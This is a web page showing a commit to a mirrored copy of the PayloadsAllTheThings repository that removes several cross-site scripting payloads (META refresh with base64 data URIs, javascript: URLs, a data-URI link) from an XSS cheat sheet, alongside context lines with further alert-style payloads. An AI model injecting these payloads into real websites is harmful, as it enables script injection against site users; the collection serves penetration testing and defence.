ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-19 19:06:12 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Merge pull request #40 from Bo0oM/patch-1

Browse Source 
Fix fake xss
This commit is contained in:
Swissky 2019-02-11 10:05:31 +01:00 committed by GitHub
commit bb0177916d
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 0 additions and 18 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

18
XSS injection/README.md
View File

@ -122,18 +122,6 @@ you can also specify an arbitratry payload with 14.rs/#payload
e.g: 14.rs/#alert(document.domain)
```
XSS in META tag
```javascript
Base64 encoded
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<meta/content="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgxMzM3KTwvc2NyaXB0Pg=="http-equiv=refresh>
With an additional URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
```
XSS in Hidden input
```javascript
@ -162,12 +150,6 @@ URL/<script>alert('XSS');//
URL/<input autofocus onfocus=alert(1)>
```
XSS using base64 encoded href data in a link
```
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk7PC9zY3JpcHQ+" target="_blank">here</a>
```
## XSS in wrappers javascript and data URI
XSS with javascript: